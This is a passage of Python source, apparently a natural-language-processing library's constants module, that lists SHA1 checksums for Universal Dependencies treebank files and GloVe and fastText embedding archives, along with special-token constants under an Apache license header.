('fi-ud-train.conllu',\n 'ab27bda8cbb62886196b78de87985a4c6cf8215d')}, 'fr_ftb': {'dev': (\n 'fr_ftb-ud-dev.conllu', '71b3cc02601f64711f98e33a6b2af10aa00700be'),\n 'test': ('fr_ftb-ud-test.conllu',\n '723b8c44e74202a18b7e71268b738a5e1aa15f86'), 'train': (\n 'fr_ftb-ud-train.conllu', '9a347120478254647deb7c7e02871b28aad23ec4')},\n 'fr_pud': {'test': ('fr_pud-ud-test.conllu',\n '570b7e31dc359ed62123bea6546efa13cfc2cf25')}, 'fr_partut': {'dev': (\n 'fr_partut-ud-dev.conllu', '1505030048829a8dccc466cc86bca057996301ae'),\n 'test': ('fr_partut-ud-test.conllu',\n 'f6446317c9f82cc0b70a76be75282804a3359ac0'), 'train': (\n 'fr_partut-ud-train.conllu', 'f87c246cfa91186b90c7780cb64783034f196622'\n )}, 'fr_sequoia': {'dev': ('fr_sequoia-ud-dev.conllu',\n 
'859b10d80c7b3a382571cce9b2620039673539d1'), 'test': (\n 'fr_sequoia-ud-test.conllu', 'be0ef69e392e64030414748da2995433f23e033d'\n ), 'train': ('fr_sequoia-ud-train.conllu',\n '48ac01913518888a32670a687123ed1bac57e0e9')}, 'fr': {'dev': (\n 'fr-ud-dev.conllu', '5de0aee778bcc69d14285ada88f0ff7e5ac0a0cd'), 'test':\n ('fr-ud-test.conllu', 'd20a014acd38193155a33a5233c13f89541c78c3'),\n 'train': ('fr-ud-train.conllu',\n 'feee0cc85a2d7dcb3397399ef22c8af8ef75420b')}, 'gl_treegal': {'dev': (\n 'gl_treegal-ud-dev.conllu', '272558614cff4a5e1f2805626904e6dc488b8d25'),\n 'test': ('gl_treegal-ud-test.conllu',\n '18d99474d3aa9c83878c42a79d7881330dd9b861'), 'train': (\n 'gl_treegal-ud-train.conllu',\n 'b1691dd5f587a19eb9dc6f141ecbd3eec3bb0e07')}, 'gl': {'dev': (\n 'gl-ud-dev.conllu', 'e72390dce9bf973442deef31ed0cd7a975361fe5'), 'test':\n ('gl-ud-test.conllu', '7d82ba3672bd4427674428e1dcbcae4feebc3aeb'),\n 'train': ('gl-ud-train.conllu',\n 'd586e7bffa314f8c5b85288e060e68dddc1f5d33')}, 'de_pud': {'test': (\n 'de_pud-ud-test.conllu', '2c91e42b7345145290b68385ff5270910048b8c4')},\n 'de': {'dev': ('de-ud-dev.conllu',\n '9b4f49bfa2b609d54369890d9e7d8d24a3c229af'), 'test': (\n 'de-ud-test.conllu', '48f0f6f98b38710906481b5e9fe1d459d28f1b4a'),\n 'train': ('de-ud-train.conllu',\n '04a1d6a6a2da9d9c38496118e0432c9a6720db64')}, 'got': {'dev': (\n 'got-ud-dev.conllu', '501c47193ca2af5826e4afcc04941df87a7c47c3'),\n 'test': ('got-ud-test.conllu',\n 'cfcf16d562434987562bd1f5faa0d8c007e9ddb8'), 'train': (\n 'got-ud-train.conllu', 'b4951ede89d947c6617df782ac248566235f78fb')},\n 'el': {'dev': ('el-ud-dev.conllu',\n '9df0919ed6f9dcab3ba3f60f0ad31d0c79ae6cdb'), 'test': (\n 'el-ud-test.conllu', '1bb4a6b24521f0c3c7d6cf71e2456ef3a1ee31aa'),\n 'train': ('el-ud-train.conllu',\n '32f4abc821624c4cd4d3b3b555c1558f06366e2c')}, 'he': {'dev': (\n 'he-ud-dev.conllu', 'c5b76874fcf11c7733e1555957bb49e8298af140'), 'test':\n ('he-ud-test.conllu', '4fbe4115948250fc2e42dd43399d1c6c11ddcfd2'),\n 'train': ('he-ud-train.conllu',\n 'eae49a515b38d224b109138bf006a112e80a7caf')}, 'hi_pud': {'test': (\n 'hi_pud-ud-test.conllu', 'd237fecc594186e7a52ad33313ac52e927905d73')},\n 'hi': {'dev': ('hi-ud-dev.conllu',\n '48b592bb1aa1cbc30d41d2913421cfd3f9d2c790'), 'test': (\n 'hi-ud-test.conllu', '004a7fdde368f32f9f230bc5e2cf4ce9e1d8f8d7'),\n 'train': ('hi-ud-train.conllu',\n '9be8afb2cabda361817c55b3de6ebba2c3fef7e0')}, 'hu': {'dev': (\n 'hu-ud-dev.conllu', 'ec622e6bcf2a84b0b47eba0de01cf5768157a50e'), 'test':\n ('hu-ud-test.conllu', 'fd717d25add38c2fb2dc8e82e2f9e5b0b9f3c5b8'),\n 'train': ('hu-ud-train.conllu',\n 'e5486523a8bebe40d633ad8b4050be8a3d11c78a')}, 'id': {'dev': (\n 'id-ud-dev.conllu', '7b181aa954a4f4b22b80a18e4f67cbf423e9c701'), 'test':\n ('id-ud-test.conllu', '357ed8c216725760bf5be561ed6e918ce602b5ac'),\n 'train': ('id-ud-train.conllu',\n '328ea588b75de55ef48373c2bf9983bca277d724')}, 'ga': {'dev': (\n 'ga-ud-dev.conllu', '180a1a9dcfcec6528a559032c67e9a15693a039d'), 'test':\n ('ga-ud-test.conllu', 'b74a56372af3f68f089ea82ba858e5a82aae4e22'),\n 'train': ('ga-ud-train.conllu',\n '40df0b12fbadae6e56c0a01da483d6c612d9450c')}, 'it_pud': {'test': (\n 'it_pud-ud-test.conllu', 'c7121c03dbdc7d27f89c6f6dd8f046b89233438e')},\n 'it_partut': {'dev': ('it_partut-ud-dev.conllu',\n '0bb5dc0c0815212c9832eaef3b802cf885e0543b'), 'test': (\n 'it_partut-ud-test.conllu', 'b5eccd3d9a94a2f96c8c3a6e4192a287ac563898'),\n 'train': ('it_partut-ud-train.conllu',\n '784b18bf8d3b59d967d147075a3cb5b03fb28637')}, 'it_postwita': {'dev': (\n 'it_postwita-ud-dev.conllu', 
'07f6f658246aa070e2166e688f7569d61aafff54'\n ), 'test': ('it_postwita-ud-test.conllu',\n 'c2d58f50e51d37cb5f55bd0a3129138e95a72a8a'), 'train': (\n 'it_postwita-ud-train.conllu',\n '69684c47fba99230f6ef1a204b95c37d28eaa5a6')}, 'it': {'dev': (\n 'it-ud-dev.conllu', 'ea8fd59f36280fbd77b9a807959491636048a698'), 'test':\n ('it-ud-test.conllu', '34839fdeeef883f8034c723a18772947106cec6b'),\n 'train': ('it-ud-train.conllu',\n 'a0cae413f46a344366f86bc7ffe4f5d7ecbf6a14')}, 'ja_pud': {'test': (\n 'ja_pud-ud-test.conllu', '4c914016a0968ca434348370d38c9579a60e8fd7')},\n 'ja': {'dev': ('ja-ud-dev.conllu',\n '21f06fef7fbeccd05a298385bf40f8b4ffe95146'), 'test': (\n 'ja-ud-test.conllu', '240d3532698356a7c6f93c3215718ef2f66a672f'),\n 'train': ('ja-ud-train.conllu',\n '35eaf307d94c2006241fe08f745d7b1b17f049cf')}, 'kk': {'dev': (\n 'kk-ud-dev.conllu', '038033c822b407040a4ecb87c077506cd0d1a322'), 'test':\n ('kk-ud-test.conllu', '4124bcaa6e4fc132613d94a882abcff8ecad8ca0'),\n 'train': ('kk-ud-train.conllu',\n '48d664d273ad6731cb65228ce9b57ad3cf50f7f5')}, 'ko': {'dev': (\n 'ko-ud-dev.conllu', '60e7da7cca44c923873a062e80262726659f5528'), 'test':\n ('ko-ud-test.conllu', 'bc9a0fc4ddfed14b70bb58048bf8b8d50062cffd'),\n 'train': ('ko-ud-train.conllu',\n 'ee21328f9ea39668e802f0cb6a794358f5c256bf')}, 'kmr': {'sample': (\n 'kmr-ud-sample.conllu', 'd76d631400d17b63b9592ce3c0f4ecada012d6d0'),\n 'test': ('kmr-ud-test.conllu',\n '606a338db2d6adde6b4d7d8c9ee2bdf1f988d729')}, 'la_ittb': {'dev': (\n 'la_ittb-ud-dev.conllu', 'd9f17992bd0258a734aea9b6c53759039717c86a'),\n 'test': ('la_ittb-ud-test.conllu',\n 'f4d097d076083240c48594d4cb058840ff16be8e'), 'train': (\n 'la_ittb-ud-train.conllu', '627d5b30b20655efab194c75fc9219b0aa2cf4b6')},\n 'la_proiel': {'dev': ('la_proiel-ud-dev.conllu',\n '9a510ff1f29b507ce46d32c04eb8f02ec8bdb4fb'), 'test': (\n 'la_proiel-ud-test.conllu', '697dbeae38507856a4fafa8506dfc8db5e8e4054'),\n 'train': ('la_proiel-ud-train.conllu',\n '5e57e0a83ed8dcdfcc892c2558249cb6bc02b37a')}, 'la': {'dev': (\n 'la-ud-dev.conllu', '2748bb0479cb599e1a007d1d1634d5870b45549b'), 'test':\n ('la-ud-test.conllu', '19c62c64ce41a650e9b55a345c61e7c0d994816e'),\n 'train': ('la-ud-train.conllu',\n '183ce6f58b0305e5926161e29b9a6aacc424662c')}, 'lv': {'dev': (\n 'lv-ud-dev.conllu', '6bf3843d92aeb5b4a5e3b457708ad0aca176fbd2'), 'test':\n ('lv-ud-test.conllu', '9f7806a24656db0e859efe041a88926b220b8e28'),\n 'train': ('lv-ud-train.conllu',\n 'f1eeff608e8f27d92b683ae041591355198841eb')}, 'lt': {'dev': (\n 'lt-ud-dev.conllu', '0b8dc19005571fa7b66d8302b797d51a241f128b'), 'test':\n ('lt-ud-test.conllu', 'def54d6caf97610eb4ca8c0179d661c8eab98951'),\n 'train': ('lt-ud-train.conllu',\n '13fe42a3d21f17a5cad5aaf38692619c7713e177')}, 'mr': {'dev': (\n 'mr-ud-dev.conllu', 'abf7ac90a3696bb979e6ddc17cbc0fc761040b1b'), 'test':\n ('mr-ud-test.conllu', 'b70e2a135e69dc17474951bfd9c7cf3f203d4798'),\n 'train': ('mr-ud-train.conllu',\n '24a1370184054a7f5af647997dca783d6c571242')}, 'sme': {'sample': (\n 'sme-ud-sample.conllu', '8c456f06b363c4d273fc454a49505f783f00fe43'),\n 'test': ('sme-ud-test.conllu',\n '6c2084f60d7f2d1468a0cb4f4a4b9669274b122e'), 'train': (\n 'sme-ud-train.conllu', '203eab4183fd585efe3fea7e6df493a6746b0a9f')},\n 'no_bokmaal': {'dev': ('no_bokmaal-ud-dev.conllu',\n '3a1aa6646ee62c605a6e5a7b535434ce93d0581f'), 'test': (\n 'no_bokmaal-ud-test.conllu', '18336ef0e4877ae28eb7d6019afe05b5a53245d5'\n ), 'train': ('no_bokmaal-ud-train.conllu',\n 'c6a1d75956dfb9376e568bf241b3ee5ebf3be3a5')}, 'no_nynorsk': {'dev': (\n 'no_nynorsk-ud-dev.conllu', 
'5b95a070d11a61a23fc340ecbbbbb70f86884498'),\n 'test': ('no_nynorsk-ud-test.conllu',\n '3eaab8e4af82de2333521e9be0954ffaf6b1440b'), 'train': (\n 'no_nynorsk-ud-train.conllu',\n '79319993097c30ddf28d4c1137b8662f4f35d17e')}, 'no_nynorsklia': {'dev':\n ('no_nynorsklia-ud-dev.conllu',\n 'f3e3cc9b156784c12e7540b6e09a19963df8d7d9'), 'test': (\n 'no_nynorsklia-ud-test.conllu',\n 'c43abf4ad0d9c1d844edb9ff0fdf8b00949c4a0b')}, 'cu': {'dev': (\n 'cu-ud-dev.conllu', '0b67035ed5ca52aeefae443611232ed202fb990a'), 'test':\n ('cu-ud-test.conllu', '0fed872a5a2480b601c67ebbecf8dcd680b6863b'),\n 'train': ('cu-ud-train.conllu',\n '1c58f7322b96aa65e2b6bbeb5cb5226b46dc3ef0')}, 'fa': {'dev': (\n 'fa-ud-dev.conllu', '098f97ff4c0a6a9dcaafe2c83908b1ff044b4446'), 'test':\n ('fa-ud-test.conllu', '0024aa6bad5eceed2e36f77d88578304a5886a80'),\n 'train': ('fa-ud-train.conllu',\n '1692f90f58fb1ed2faaa4e8c5d2d47a37c47082b')}, 'pl': {'dev': (\n 'pl-ud-dev.conllu', 'b7af7bee091feb0788eb9793a7102972006421dc'), 'test':\n ('pl-ud-test.conllu', 'e141e793ba35f8a08510ec1ce494099b5c800ca8'),\n 'train': ('pl-ud-train.conllu',\n 'f2227ba184a5030fc47b1aff732e04ae11b9ab94')}, 'pt_br': {'dev': (\n 'pt_br-ud-dev.conllu', '8eedc77096a87fe8ab251100d460780e161e5397'),\n 'test': ('pt_br-ud-test.conllu',\n '37a64e3acef107b62ab62ce478fc36ed112fb58f'), 'train': (\n 'pt_br-ud-train.conllu', '023cafcb6959d52298ad619f7838f26db9798aa9')},\n 'pt_pud': {'test': ('pt_pud-ud-test.conllu',\n '4f7a98b59255ff58a1a423dda6f2cb7261dcea7d')}, 'pt': {'dev': (\n 'pt-ud-dev.conllu', '2171b4ac2b0726c9dfae6adf394b76be927accab'), 'test':\n ('pt-ud-test.conllu', '9e819a4592db42905806141d6fca3b7b20396ce3'),\n 'train': ('pt-ud-train.conllu',\n 'b5fbb6598d5cc53a0f7e699adeb4a61948a49b5c')}, 'ro_nonstandard': {'test':\n ('ro_nonstandard-ud-test.conllu',\n '300d53091412dc5700dc5cad0fd3e136f7c8cb11'), 'train': (\n 'ro_nonstandard-ud-train.conllu',\n 'ed97f51129b63857627f838f68f41c9ef8541686')}, 'ro': {'dev': (\n 'ro-ud-dev.conllu', 'a320e29582e837fa48bbe0aab8e205cadfcb4a02'), 'test':\n ('ro-ud-test.conllu', '0cfe4806a28ebdc02dc7ea58635d8b550c3a9d7b'),\n 'train': ('ro-ud-train.conllu',\n '74beb2aa92d2fca50dbb1a4f716b936afb436ab9')}, 'ru_pud': {'test': (\n 'ru_pud-ud-test.conllu', 'bca81ce7aaf3cb8add98b19faecc1d8303901631')},\n 'ru_syntagrus': {'dev': ('ru_syntagrus-ud-dev.conllu',\n '304c6ec7fb5060583af5f890384e3a480f8c3ad5'), 'test': (\n 'ru_syntagrus-ud-test.conllu',\n 'c138e39b48dc1c66d106e68ee75c6fce28ef780c'), 'train': (\n 'ru_syntagrus-ud-train.conllu',\n '8fa56fa80845e4ad946189d1e7af228b5595e312')}, 'ru': {'dev': (\n 'ru-ud-dev.conllu', 'd3b11c0fd8a87bfb7ce9666a1888126ae5ddca90'), 'test':\n ('ru-ud-test.conllu', 'ae13bbf49e0d2fddae8ba2eeacd15a9a77c7bfff'),\n 'train': ('ru-ud-train.conllu',\n 'fd43e7323ad2e62a6924fc5b5d48e85c6ab5a430')}, 'sa': {'test': (\n 'sa-ud-test.conllu', 'fad3a03a6834884a092b1d326625c6f663e36636')}, 'sr':\n {'dev': ('sr-ud-dev.conllu', 'dcb9a242986285e83512ddaa4b3ada07c4cea17a'\n ), 'test': ('sr-ud-test.conllu',\n '0f0c9e394c440bb2dd514bdd6873d3ffef13821b'), 'train': (\n 'sr-ud-train.conllu', '97ea9bfe4ac97011598fbb5ca20b5cbaf5093334')},\n 'sk': {'dev': ('sk-ud-dev.conllu',\n 'c84563c08922d60b0c765e9f9c22d9f6f2765ff9'), 'test': (\n 'sk-ud-test.conllu', '89af4581c5f9058809f48788eb635a92cda0603c'),\n 'train': ('sk-ud-train.conllu',\n '89e108093bbf5619578955fdadfe200cefd8cf01')}, 'sl_sst': {'dev': (\n 'sl_sst-ud-dev.conllu', 'c65ae82123af95ec11f47262546b5ab2fc5735e5'),\n 'test': ('sl_sst-ud-test.conllu',\n 
'144a0124c1181b49d0c542a4a6d4465e45545f3b'), 'train': (\n 'sl_sst-ud-train.conllu', '4cbb97d5c19cfb1d85cdd54a13e24de2343a4ac5')},\n 'sl': {'dev': ('sl-ud-dev.conllu',\n '0078572c19574d32defeae9924176da2dd701ede'), 'test': (\n 'sl-ud-test.conllu', '616ace00e25df99be8dd49b7bf7c48f1093df96a'),\n 'train': ('sl-ud-train.conllu',\n '1462ac69163b30cf1399527e95f686ebf91be2d3')}, 'es_ancora': {'dev': (\n 'es_ancora-ud-dev.conllu', '94b00cc6449a1793b5ba1d9d5c1e4b34ad1cc7d5'),\n 'test': ('es_ancora-ud-test.conllu',\n '8d7dc8d8441e1ca4b54708a5382ed61b48bf7920'), 'train': (\n 'es_ancora-ud-train.conllu', '95d5bf7ad33304f3440ffb014ac094c4967c303f'\n )}, 'es_pud': {'test': ('es_pud-ud-test.conllu',\n 'c2b17fce1da3bdd2a50d9dd7eca101db1d2907e0')}, 'es': {'dev': (\n 'es-ud-dev.conllu', '4cdb828c492c6b7707af0ab6c7fbf734f770630a'), 'test':\n ('es-ud-test.conllu', 'afd1ae1b7eb73a91456c30acf388eef4faf4785a'),\n 'train': ('es-ud-train.conllu',\n '5ce48b44ba1b3e748a40cb5bf893d3096518ecbc')}, 'sv_lines': {'dev': (\n 'sv_lines-ud-dev.conllu', '15f1a04d960518fe7bfee23ce227fc7b78d4b755'),\n 'test': ('sv_lines-ud-test.conllu',\n '843df4ea3ab4f551b1eaa661652a8d6489a81d41'), 'train': (\n 'sv_lines-ud-train.conllu', '16e3533bf174b36d728847a36a3600f16c63baa6')\n }, 'sv_pud': {'test': ('sv_pud-ud-test.conllu',\n '18dadac0c15468256b340835ebc0529facbe9b73')}, 'sv': {'dev': (\n 'sv-ud-dev.conllu', '6d14e1aae5c9ae37c35481c44c04bf74a4233455'), 'test':\n ('sv-ud-test.conllu', '7ead0f7b49508db0022c042195ac5925b611c5b7'),\n 'train': ('sv-ud-train.conllu',\n '68affb85efde6ed017eab1e998e9666108559e04')}, 'swl': {'dev': (\n 'swl-ud-dev.conllu', '828e0a08f12cabfa75f9dd2b53dba58606522a7c'),\n 'test': ('swl-ud-test.conllu',\n '674f76631cf16172d67b795ff92dfbb297eb4930'), 'train': (\n 'swl-ud-train.conllu', '46b721f9cae2d5ba43f818dd487600b0ce76362a')},\n 'ta': {'dev': ('ta-ud-dev.conllu',\n '4d01f555012ddc1976933d4d928e26470f71bfa1'), 'test': (\n 'ta-ud-test.conllu', 'e8db8816a98d8b7e81188786db7c405979a7e3c3'),\n 'train': ('ta-ud-train.conllu',\n '6753d8c7b1b016de39c087aab45056de6021c3ae')}, 'te': {'dev': (\n 'te-ud-dev.conllu', '29f46355d767e54e8565f76a063c43e95ead0fca'), 'test':\n ('te-ud-test.conllu', '50abe345d4ab5bae021cacd096266c57b00572b8'),\n 'train': ('te-ud-train.conllu',\n '1794469abe09e7364cda0d9764cf515dcb4a61b6')}, 'tr_pud': {'test': (\n 'tr_pud-ud-test.conllu', 'aae839e2476a2f149c98e0274d245d07a50dafaa')},\n 'tr': {'dev': ('tr-ud-dev.conllu',\n '421de4d8d0fbdda46750523bde72880414c134a3'), 'test': (\n 'tr-ud-test.conllu', 'b175f136f6f0271c494a58a1846971c4a07cda27'),\n 'train': ('tr-ud-train.conllu',\n '5aeaf25fc9e00c75e377983a0d0a642e4df6ae7d')}, 'uk': {'dev': (\n 'uk-ud-dev.conllu', '0d3e3507edcd46a3eaa8c4702d0f5d84661a6d9d'), 'test':\n ('uk-ud-test.conllu', '46c88fd623894fabdafb01a826016c215e4f65cc'),\n 'train': ('uk-ud-train.conllu',\n 'd06e0e2fa67c35a20517738bd728ac3b26d8eafe')}, 'hsb': {'sample': (\n 'hsb-ud-sample.conllu', '148eddbb19b06115ea54e17a3fca58e99a85cbd9'),\n 'test': ('hsb-ud-test.conllu',\n '3d319288b4c06395b2627980737131995949f770')}, 'ur': {'dev': (\n 'ur-ud-dev.conllu', 'dc41e72b5adeb92f308cdc8dfcbf71f84b4a5cf9'), 'test':\n ('ur-ud-test.conllu', 'af5da25be4c4ec1f2a222bc462b39ca4bbcc0eb0'),\n 'train': ('ur-ud-train.conllu',\n '488d65b394d0de264be1221614c09e541f92f9de')}, 'ug': {'dev': (\n 'ug-ud-dev.conllu', 'a2e6cd7ef51ffd7c83de7c62fbad998f1020f857'), 'test':\n ('ug-ud-test.conllu', '4877323d8dbfaa8ab862f0aa8e5484fdadb9ef43')},\n 'vi': {'dev': ('vi-ud-dev.conllu',\n 
'1c733d3ea3e4cce00cb0aa4d599bcb3b0a6096a8'), 'test': (\n 'vi-ud-test.conllu', '1bb822e58f21aa5ccac15fe6c6742a42e8389d41'),\n 'train': ('vi-ud-train.conllu',\n 'ac86132afc061625740abd524c5cdf3d35ebbbc4')}}\n",
"step-3": "# coding: utf-8\n\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n# pylint: disable=too-many-lines\n\"\"\"Constants.\"\"\"\n\nUNK_TOKEN = '<unk>'\n\nBOS_TOKEN = '<bos>'\n\nEOS_TOKEN = '<eos>'\n\nPAD_TOKEN = '<pad>'\n\nUNK_IDX = 0 # This should not be changed as long as serialized token\n # embeddings redistributed on S3 contain an unknown token.\n # Blame this code change and see commit for more context.\n\nLARGE_POSITIVE_FLOAT = 1e18\n\nLARGE_NEGATIVE_FLOAT = -LARGE_POSITIVE_FLOAT\n\nGLOVE_NPZ_SHA1 = \\\n {'glove.42B.300d': ('glove.42B.300d.npz',\n '7deee8f4860744db53ed9e50892effe9883e6d89'),\n 'glove.6B.100d': ('glove.6B.100d.npz',\n '01f80f202fcabcc3e0804898349087bfc191dd1c'),\n 'glove.6B.200d': ('glove.6B.200d.npz',\n '5e6e2bdab346c257f88d80d215d518e680d86e32'),\n 'glove.6B.300d': ('glove.6B.300d.npz',\n '1db264aa936be62f055dfb72854204450bdf4399'),\n 'glove.6B.50d': ('glove.6B.50d.npz',\n 'aa16be8d184399d2199f83fd62586f2c30497bfa'),\n 'glove.840B.300d': ('glove.840B.300d.npz',\n 'b4ba390c1154736e07c0e67d9180935f5930e83c'),\n 'glove.twitter.27B.100d': ('glove.twitter.27B.100d.npz',\n '0f7b82c223451d0002f79ba23596983cdbe0e2b1'),\n 'glove.twitter.27B.200d': ('glove.twitter.27B.200d.npz',\n '41cc2d26f58a54622ce96bf6c8434360ab524f20'),\n 'glove.twitter.27B.25d': ('glove.twitter.27B.25d.npz',\n '9f563d2f296995598cc46812b2fda05ad4c3c879'),\n 'glove.twitter.27B.50d': ('glove.twitter.27B.50d.npz',\n 'ce9959c056f2a0a780c468feeb4f823af51630e9')}\n\nFAST_TEXT_NPZ_SHA1 = \\\n {'crawl-300d-2M': ('crawl-300d-2M.npz',\n '9dd611a1fe280c63050cd546d3595400fc0eede4'),\n 'wiki.aa': ('wiki.aa.npz',\n '48f163b80eb37f1806142169d3d4c05cf75b7339'),\n 'wiki.ab': ('wiki.ab.npz',\n '860ceff119dd27e5b701b605879037c1310cbc3e'),\n 'wiki.ace': ('wiki.ace.npz',\n '62938287464040491719f56a6f521f8f808beee8'),\n 'wiki.ady': ('wiki.ady.npz',\n '646843afa260d018ed711df3f1ca9c3e000447b6'),\n 'wiki.af': ('wiki.af.npz',\n '7b14cd27690b67fea318d0bac2283c16430680e2'),\n 'wiki.ak': ('wiki.ak.npz',\n '20f309adad1c45958c97b6055d5838e05bbaea72'),\n 'wiki.als': ('wiki.als.npz',\n 'a8b03aa133c4f7da12fc27c2b167b7918b1e9805'),\n 'wiki.am': ('wiki.am.npz',\n 'ed3dd10cea64737f7a1623612ee099df9dc19f66'),\n 'wiki.ang': ('wiki.ang.npz',\n '8efe64706d9d6b8eae38b2c7ff0b277e20592bc7'),\n 'wiki.an': ('wiki.an.npz',\n '168046283c719ab96a29b1abae2e25a6575c7be8'),\n 'wiki.arc': ('wiki.arc.npz',\n '049021b7decea4bc009b12936e56b4dbf5b760e7'),\n 'wiki.ar': ('wiki.ar.npz',\n '7e325e1e98dfcdc9368d2ebe40ee834a2ed44912'),\n 'wiki.arz': ('wiki.arz.npz',\n '7d851c2c7be3ee6f7fd896de7b76ea08e3fb08b0'),\n 'wiki.as': ('wiki.as.npz',\n '01d38c29cd4bd99c1a8534abc058822da14a5b9c'),\n 'wiki.ast': ('wiki.ast.npz',\n '9c9846ba5084505a0adea89c95c66e04efbf5ce9'),\n 'wiki.av': ('wiki.av.npz',\n 
'7ef6a920c364638504e673cfde5f7675503fa81e'),\n 'wiki.ay': ('wiki.ay.npz',\n 'c1202e110930e3902397f5cb64a8359e013b469f'),\n 'wiki.azb': ('wiki.azb.npz',\n '10351b7ef14ec2cb610d290cb6a3f6987ef5d8b3'),\n 'wiki.az': ('wiki.az.npz',\n '74257c3bcd533a606afae509ea835dc036d61546'),\n 'wiki.ba': ('wiki.ba.npz',\n '4a2857ed694d66864df562b376c2fa12fcb03646'),\n 'wiki.bar': ('wiki.bar.npz',\n 'e65c6b7e9ff83798d1eea05d166148837d53e615'),\n 'wiki.bat_smg': ('wiki.bat_smg.npz',\n '6420584ae28ba6c9dd145fea8f096243d457c2d8'),\n 'wiki.bcl': ('wiki.bcl.npz',\n '33606c970ab336b678393e2bdb8af2116d11cf7b'),\n 'wiki.be': ('wiki.be.npz',\n '84487d341e333344cf71bc12c7a205d923762498'),\n 'wiki.bg': ('wiki.bg.npz',\n '56f2a175b1a1d1a9cf9f1cea277cd0b46ffd7f66'),\n 'wiki.bh': ('wiki.bh.npz',\n '07473989853a344a41aaa18f41030dc56d0d01c7'),\n 'wiki.bi': ('wiki.bi.npz',\n '08adfa3c9ef3016d30ef69ea539d217ff67eda09'),\n 'wiki.bjn': ('wiki.bjn.npz',\n '998a551283222931d3a26922308449950bfa3ec7'),\n 'wiki.bm': ('wiki.bm.npz',\n '454ff9fbd4790e4a076d9a2087a51da28aa1332f'),\n 'wiki.bn': ('wiki.bn.npz',\n '1f36f6f39c9a9b33bb8035c9a4dc7e04933604fd'),\n 'wiki.bo': ('wiki.bo.npz',\n 'b9fe87318428de0a7790de175b5fec80c5af482d'),\n 'wiki.bpy': ('wiki.bpy.npz',\n '5c7853173d27e2c018c24eca69de8d5f34511b0d'),\n 'wiki.br': ('wiki.br.npz',\n '7aa66a2034fbfaa1d39e637385d48610238797c9'),\n 'wiki.bs': ('wiki.bs.npz',\n 'a019a4677677c2e9e4d899326b2b6c15ad6c011a'),\n 'wiki.bug': ('wiki.bug.npz',\n '09ae3477941d7a99d1df494368d7efb0b2c18913'),\n 'wiki.bxr': ('wiki.bxr.npz',\n 'b832c691b8ddd95896c052d3d15e1f98d72068d5'),\n 'wiki.ca': ('wiki.ca.npz',\n '391e0d4daad08649251274fa1cc2a5f49c7728b1'),\n 'wiki.cbk_zam': ('wiki.cbk_zam.npz',\n '02e57a763bc9f9eadaba57953383dd12a0a78a37'),\n 'wiki.cdo': ('wiki.cdo.npz',\n 'd6e8f422327e8b2273f1f2662d793707ece6695d'),\n 'wiki.ceb': ('wiki.ceb.npz',\n '23bc0bb9aeaa57dff35092766941a866de142aae'),\n 'wiki.ce': ('wiki.ce.npz',\n '182b2a889256119a6d379d501c55c7621e5855db'),\n 'wiki.ch': ('wiki.ch.npz',\n '82dd77512fcb463481f43c9cef3507e2baa90d7b'),\n 'wiki.cho': ('wiki.cho.npz',\n 'b0b620fc2442d1a6e2440e71a424861c80175f0c'),\n 'wiki.chr': ('wiki.chr.npz',\n '3d62c6b95c5af46abd6234426ae760cca65d5bd0'),\n 'wiki.chy': ('wiki.chy.npz',\n '34a28a22da79aebc100e3714b825c95c8d5f54a3'),\n 'wiki.ckb': ('wiki.ckb.npz',\n 'ad19461e4be583d08b7693ff5b1e9d590ed41add'),\n 'wiki.co': ('wiki.co.npz',\n 'fa60d9f0e79f1c7e15f381aef983a0f4f31c05a8'),\n 'wiki.crh': ('wiki.crh.npz',\n '540270ba6edd9d7b2f7efca52b3b407524ac67d1'),\n 'wiki.cr': ('wiki.cr.npz',\n 'f06b77465a38ec960d7d5a7554b848c37e945c76'),\n 'wiki.csb': ('wiki.csb.npz',\n 'b8b28559cf2541341af98e2aa755856765bdeabf'),\n 'wiki.cs': ('wiki.cs.npz',\n '19881e931fe06abf341450f00c342d364313e232'),\n 'wiki.cu': ('wiki.cu.npz',\n '731e0d00abd53bc2a8eb6cf37f6ab883cff34e15'),\n 'wiki.cv': ('wiki.cv.npz',\n 'e60034fcffb7dfef7b236ddba1194c3aa20b7967'),\n 'wiki.cy': ('wiki.cy.npz',\n '5a0fb967b5556f007c0d5065f951a3d3b1c1005a'),\n 'wiki.da': ('wiki.da.npz',\n 'd06258014ba2c7450bc2d55edfdf1731433e42e5'),\n 'wiki.de': ('wiki.de.npz',\n 'a21694dfd2af63bd7bb00f0b60b28e88bd1153f1'),\n 'wiki.diq': ('wiki.diq.npz',\n '4f6c77a86b39834a7130419967759afd8cc26b84'),\n 'wiki.dsb': ('wiki.dsb.npz',\n 'e74f1d346a8db96987bff0c33ee5f886907c380a'),\n 'wiki.dv': ('wiki.dv.npz',\n '5d6fe6f0eec2e7704121d5aba03b4edbb28af873'),\n 'wiki.dz': ('wiki.dz.npz',\n '77c639d36d0355b2de5adead7996eae342b852a6'),\n 'wiki.ee': ('wiki.ee.npz',\n '4b5a76127d57515d3e8a76787cdefde5856b754a'),\n 'wiki.el': ('wiki.el.npz',\n 
'a00bcb97e7898931196a1c69f7a492e5b6202661'),\n 'wiki.eml': ('wiki.eml.npz',\n 'b475d626b3d97e7a68c02827fdc7900599e838c6'),\n 'wiki.en': ('wiki.en.npz',\n 'ad5ec6d49db6c6fe76b8e85ff05d34e5d0e1eb6a'),\n 'wiki.eo': ('wiki.eo.npz',\n '18049b0010520d13e676f5a82e8bb90153d99003'),\n 'wiki.es': ('wiki.es.npz',\n 'a6d192ba7d82d762f8367e75ca951aad4d11e410'),\n 'wiki.et': ('wiki.et.npz',\n '4beb7025cf88f1aa62d025b187f0cb09aee61858'),\n 'wiki.eu': ('wiki.eu.npz',\n '5e1a8197e35f20a2476798bbb935b4c131289c4f'),\n 'wiki.ext': ('wiki.ext.npz',\n '049b2d1b0a8b102b45907cf487cac30aa294e0a0'),\n 'wiki.fa': ('wiki.fa.npz',\n '81ed274997c87ef87d73d25e166ca06272ce426f'),\n 'wiki.ff': ('wiki.ff.npz',\n 